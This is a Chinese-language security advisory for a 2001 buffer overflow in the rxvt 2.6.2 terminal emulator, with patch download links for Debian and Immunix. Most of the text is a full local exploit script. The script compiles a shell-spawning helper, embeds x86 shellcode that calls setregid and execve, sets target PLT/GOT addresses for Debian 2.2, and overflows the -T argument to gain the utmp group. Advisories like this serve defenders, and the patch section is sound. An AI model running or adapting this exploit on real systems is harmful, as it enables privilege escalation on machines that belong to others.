Rxvt存在缓冲溢出漏洞发布时间:2001-06-29 更新时间:2001-06-29 严重程度:高 威胁程度:权限提升 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 rxvt rxvt 2.6.2详细描述 Rxvt是彩色 VT102终端模拟器可代替XTERM,其中存在缓冲溢出漏洞, 问题产生在当部分命令行选项带超长参数传递给rxvt时候。由于rxvt 是一utmp的权利安装,可以导致用户的权利提升。 测试代码 #!/bin/sh # # MasterSecuritY <www.mastersecurity.fr> # # xrxvt.sh - Local exploit for xrxvt 2.6.2 # Copyright (C) 2001 Michel "MaXX" Kaempf <maxx@mastersecurity.fr> # Copyright (C) 2001 Samuel "Zorgon" Dralet <samuel.dralet@mastersecurity.fr> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or (at # your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 # USA # echo "rxvt-2.6.2 exploit for Linux Debian 2.2" echo "Which target :" echo -e "\t0. rxvt 2.6.2 (package deb) on Debian 2.2" echo -e "\t1. rxvt 2.6.2 (tarball) on Debian 2.2" echo echo -n "target : " read TARGET cat > /tmp/xx.c <<EOF #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> int main() { char * p_ttyname; char * argv[] = { "/bin/sh", NULL }; p_ttyname = ttyname( STDERR_FILENO ); if ( p_ttyname == NULL ) { return( -1 ); } if ( open(p_ttyname, O_RDONLY) != STDIN_FILENO ) { return( -1 ); } if ( open(p_ttyname, O_WRONLY) != STDOUT_FILENO ) { return( -1 ); } execve( argv[0], argv, NULL ); return( -1 ); } EOF gcc -o /tmp/xx /tmp/xx.c rm -f /tmp/xx.c cat > /tmp/xrxvt.c << EOF #include <stdio.h> #include <string.h> #include <unistd.h> #include <X11/X.h> #include <X11/Xlib.h> #define BUF 256 /* buffer size */ #define EBP 4 #define EIP 4 #define ESC 3 /* alignment */ #define GID "\x2b" #define DISPLAY ":0" #define STACK ( 0xc0000000 - 4 ) Display *d; char shellcode[] = /* setregid( -1, GID ); */ "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1"GID"\x31\xc0\xb0\x47\xcd\x80" /* setregid( GID, GID ); */ "\x31\xdb\x31\xc9\xb3"GID"\xb1"GID"\x31\xc0\xb0\x47\xcd\x80" /* Aleph One ;) */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/xx"; struct os { int id; char *desc; char *path; unsigned long plt; unsigned long got; }; struct os target[]= { { 0, "rxvt 2.6.2 (package deb) on Debian 2.2", "/usr/X11R6/bin/rxvt-xterm", 0x0804add0, 0x0805c964 }, { 1, "rxvt 2.6.2 (tarball) on Debian 2.2", "/usr/local/bin/rxvt", 0x0804a690, 0x08059e1c }, { 2, NULL, 0, 0 } }; void usage ( char *cmd ) { int i; fprintf(stderr, "rxvt-2.6.2 exploit for Linux Debian 2.2\n"); fprintf(stderr, "usage: %s <target>\n",cmd); fprintf(stderr, "with target:\n\n"); for( i < 0; i < sizeof(target) / sizeof(struct os); i++ ) fprintf(stderr, "%d. %s\n", i, target[i].desc); exit( -1 ); } int main(int argc, char *argv[]) { char buffer[ BUF - ESC + EBP + EIP + 12 + 1]; char * exec_argv[] = { NULL, "-T", buffer, NULL }; char * envp[] = { shellcode, NULL }; int i, t; char *path; if ( argc != 2 ) usage(argv[0]); t = atoi(argv[1]); if( t < 0 || t >= sizeof(target) / sizeof(struct os) ) usage( argv[0] ); path = (char *)malloc(strlen(target[t].path)+1); strcpy(path,target[t].path); if ( (d = XOpenDisplay(DISPLAY)) == NULL ){ fprintf(stderr, "Unable to open display: %s\n", DISPLAY); exit(10); } for ( i = 0; i < BUF - ESC + EBP; i++ ) { buffer[ i ] = 'A'; } *( (size_t *) &(buffer[i]) ) = target[t].plt; i += sizeof(size_t); *( (size_t *) &(buffer[i]) ) = target[t].got + 4; i += sizeof(size_t); *( (size_t *) &(buffer[i]) ) = target[t].got + 4; i += sizeof(size_t); *( (size_t *) &(buffer[i]) ) = STACK - (strlen(path) + 1) - sizeof(shellcode); i += sizeof(size_t); buffer[i] = '\0'; exec_argv[0] = path; execve( exec_argv[0], exec_argv, envp ); return( -1 ); } EOF gcc -o /tmp/xrxvt /tmp/xrxvt.c -lX11 rm -f /tmp/xrxvt.c echo "Go to rxvt window and type 'echo -ne \"\033[21t\"' ..." echo "And see ..." /tmp/xrxvt $TARGET 解决方案 请下载补丁程序: rxvt rxvt 2.6.2: Debian upgrade 2.2 i386 rxvt_2.6.2-2.1_i386.deb http://security.debian.org/dists/stable/updates/main/binary-i386/rxvt_2.6.2-2.1_i386.deb Debian upgrade 2.2 i386 rxvt-ml_2.6.2-2.1_i386.deb http://security.debian.org/dists/stable/updates/main/binary-i386/rxvt-ml_2.6.2-2.1_i386.deb Debian upgrade 2.2 arm rxvt_2.6.2-2.1_arm.deb http://security.debian.org/dists/stable/updates/main/binary-arm/rxvt_2.6.2-2.1_arm.deb Debian upgrade 2.2 arm rxvt-ml_2.6.2-2.1_arm.deb http://security.debian.org/dists/stable/updates/main/binary-arm/rxvt-ml_2.6.2-2.1_arm.deb Debian upgrade 2.2 alpha rxvt_2.6.2-2.1_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/rxvt_2.6.2-2.1_alpha.deb Debian upgrade 2.2 alpha rxvt-ml_2.6.2-2.1_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/rxvt-ml_2.6.2-2.1_alpha.deb Debian upgrade 2.2 m68k rxvt-ml_2.6.2-2.1_m68k.deb http://security.debian.org/dists/stable/updates/main/binary-m68k/rxvt-ml_2.6.2-2.1_m68k.deb Debian upgrade 2.2 m68k rxvt_2.6.2-2.1_m68k.deb http://security.debian.org/dists/stable/updates/main/binary-m68k/rxvt_2.6.2-2.1_m68k.deb Debian upgrade 2.2 ppc rxvt-ml_2.6.2-2.1_powerpc.deb http://security.debian.org/dists/stable/updates/main/binary-powerpc/rxvt-ml_2.6.2-2.1_powerpc.deb Debian upgrade 2.2 ppc rxvt_2.6.2-2.1_powerpc.deb http://security.debian.org/dists/stable/updates/main/binary-powerpc/rxvt_2.6.2-2.1_powerpc.deb Debian upgrade 2.2 sparc rxvt-ml_2.6.2-2.1_sparc.deb http://security.debian.org/dists/stable/updates/main/binary-sparc/rxvt-ml_2.6.2-2.1_sparc.deb Debian upgrade 2.2 sparc rxvt_2.6.2-2.1_sparc.deb http://security.debian.org/dists/stable/updates/main/binary-sparc/rxvt_2.6.2-2.1_sparc.deb rxvt rxvt 2.6.1: Immunix RPM 6.2 i386 rxvt-2.6.1-8_StackGuard_1.i386.rpm http://download.immunix.org/ImmunixOS/6.2/updates/RPMS/rxvt-2.6.1-8_StackGuard_1.i386.rpm Immunix RPM 7.0 i386 rxvt-2.6.3-2_imnx_2.i386.rpm http://download.immunix.org/ImmunixOS/7.0/updates/RPMS/rxvt-2.6.3-2_imnx_2.i386.rpm 相关信息 |
